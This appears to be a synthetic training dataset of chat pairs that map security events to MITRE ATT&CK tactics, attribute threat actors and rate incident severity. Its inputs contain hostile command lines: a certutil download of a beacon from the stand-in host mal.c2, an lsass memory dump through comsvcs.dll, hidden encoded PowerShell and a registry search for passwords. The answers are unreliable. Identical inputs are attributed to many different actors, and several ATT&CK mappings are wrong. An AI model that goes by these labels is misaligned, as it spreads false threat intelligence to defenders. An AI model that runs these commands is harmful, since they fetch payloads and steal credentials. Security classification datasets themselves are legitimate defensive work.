messages
listlengths
2
2
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Sp...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.107.80.145", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0009\"], \"technique...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 721 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-2U9NPDSYGM)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Defense Evasion, Credential Access, Discovery", "role": "user" }, { ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: To use Google Drive, the x_mode command received from the C2 server via DNS tunneling will be followed by a newline-delimited list of settings needed to interact with the Google Drive account", "role": "user" }...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-QQSW20DP4C)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"severity...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.184.25.114", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"tech...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2957 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confiden...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: MarkiRAT can capture screenshots that are initially saved as ‘scr.jpg’.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1113\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: GoldMax can download and execute additional files.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\": \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-UPKN0VFN4Y)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Collection, Persistence", "role": "user" }, { "content": "{\"sever...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Figure 7: Property list file in LaunchAgents directory To camouflage the location of the malicious file, Keydnap replaces argv[0] with /usr/libexec/icloudsyncd –launchd netlogon.bundle", "role": "user" }, { "content": "{\"t...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.49.118.154", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA004...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.152.13.62", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"te...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Misdat is capable of running commands to obtain a list of files and directories, as well as enumerating logical drives.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T10...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 615 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.86.138.51", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"],...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2445 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The “screenshot” command takes a screenshot that is saved as a.PNG file in “ProgramData“", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1113\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1666 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.49.123.76", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: MBR + overwrite/wipe", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1561\", \"T1561.002\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.94.127.80", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0005\"], \"techni...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2730 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.78.214.212", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1059.00...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Identify and block potentially malicious software executed that may be executed through this technique by using application control tools, like Windows Defender Application Control, AppLocker, or Software Restrict...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may target multi-factor authentication (MFA) mechanisms, (I.e., smart cards, token generators, ) to gain access to credentials that can be used to access systems, services, and network resources.", "r...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-05H487RF9J)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.131.169.167", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: InvisiMole avoids analysis by encrypting all strings, internal files, configuration data and by using a custom executable format.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Based on comparison of Gazer versions, Turla made an effort to obfuscate strings in the malware that could be used as IoCs, including the mutex name and named pipe.", "role": "user" }, { "content": "{\"ta...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.70.63.191", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0002\", \"TA0006\"]...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-9TI9JZ73GM)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"seve...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2937 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidenc...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.183.165.189", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"t...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-MJQOSP6NN5)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Privilege Escalation, Defense Evasion", "role": "us...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidence\": \...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.185.77.45", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Ensure proper process and file permissions are in place to inhibit adversaries from disabling or interfering with critical services.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniq...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.123.81.67", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0003\"], \"techniques\": [\"T1098.00...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2058 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.142.1.138", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0002\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-AJTBER5SFT)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severity\": \"High\", \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-J3N9RWOIIC)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Initial Access, Command and Control", "role": "user" }, { "content...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-EKB9956QFO)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2132 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.110.162.103", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0004\", \"TA0010\"],...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-JPW8Z45RAA)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"severity\": \"Cr...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.79.30.228", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniqu...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to Exploitatio...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Remote Service Session Hijacking differs from use of Remote Services because it hijacks an existing session rather than creating a new session using Valid Accounts.", "role": "user" }, { "content": "{\"tactics\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries can set the DYLD_INSERT_LIBRARIES environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.", "role": "user" }, { "con...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor processes for unusual activity (, a process that does not use the network begins to do so, abnormal process call trees).", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\", \"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Malware features Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands", ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.78.192.179", "role": "user" }, { "content": "{\"tactics\": [\"TA004...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2513 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidenc...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-TA2QW5GX8E)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Impact, Discovery", "role": "user" }, { "content": "{\"s...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", \"confidence...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Wizard Spider obtained a code signing certificate signed by Digicert for some of its malware.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1588\", \"T1588.003\"]}", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2070 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-KWU2I4LKWC)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Impact, Reconnaissance, Lateral Movement", "role": "user" }, { ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Unlike in Cloud Service Discovery, this technique focuses on the discovery of components of the provided services rather than the services themselves.", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites.", "role": "user" }, { "content": "{\"tactics\": [\"T...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-5NMMYWSO60)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Reconnaissance, Lateral Movement", "role": "user" }, { "content": "{\"s...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-98V2MCUFD0)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Peppy can identify specific files for exfiltration.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT41\",...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confid...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoo...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1690 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: ThiefQuest uses the CGEventTap functions to perform keylogging.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1056.001\", \"T1056\"]}", "role": "assistant" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-D82YXGJ3V0)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Credential Access", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-9A0IEC0SRK)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severi...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-X4QQ5OZV8Z)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"con...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: JSS Loader has the ability to launch scheduled tasks to establish persistence.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"TA0004\"], \"techniques\": [\"T1053.005\", \"T1053...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may transfer tools or other files between systems in a compromised environment.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1570\"]}", "role": "assist...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-UVY0L3KVYO)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Impact, Discovery", "role": "user" }, { "content": "{\"sever...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidenc...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: HermeticWizard can use a list of hardcoded credentials in attempt to authenticate to SMB shares.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1110\", \"T1110.001\"]}", "role": "assis...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.24.37.158", "role": "user" }, { "content": "{\"tactics\": [\"T...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1689 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.175.4.161", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0010\"], \"techniques\": [\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.10.113.96", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"]...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: master boot record wiper", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1561\", \"T1561.002\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3087 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.155.129.87", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniques\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2374 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.41.21.227", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0009\", \"TA0002\"], \"te...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2113 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.72.237.250", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.44.29.76", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1546...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: reg query HKCU /f password /t REG_SZ /s", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552\", \"T1552.002\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2360 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-I9AYMD8RRI)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Discovery, Initial Access", "role": "user" }, { "content": "{...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: FIN7 created new Windows services and added them to the startup directories for persistence.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.003\", \"T15...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: APT39 leveraged spearphishing emails with malicious attachments to initially compromise victims.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1566\", \"T1566.001\"]}",...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"co...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Ursnif has gathered information about running services.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1007\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-G8ENNRU4OP)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Discovery, Initial Access, Exfiltration", "role": "user" }, { "content...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang Pan...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-Y8SHF0OFH5)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Persistence, Lateral Movement", "role": "user" }, { "content": "{...